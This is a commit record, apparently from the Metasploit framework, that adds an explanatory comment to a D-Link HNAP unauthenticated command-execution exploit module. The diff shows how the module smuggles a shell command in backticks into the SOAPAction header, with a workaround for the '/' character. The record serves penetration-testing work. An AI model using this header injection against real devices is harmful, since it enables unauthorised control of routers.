Land rapid7#5439, @firefart's explanations on dlink_upnp_header_exec_noauth

Author: jvazquez-r7

modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb

@@ -99,6 +99,7 @@ def execute_command(cmd, opts)
 
     uri = '/HNAP1/'
 
+    # we can not use / in our command so we need to use a little trick
     cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
     soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"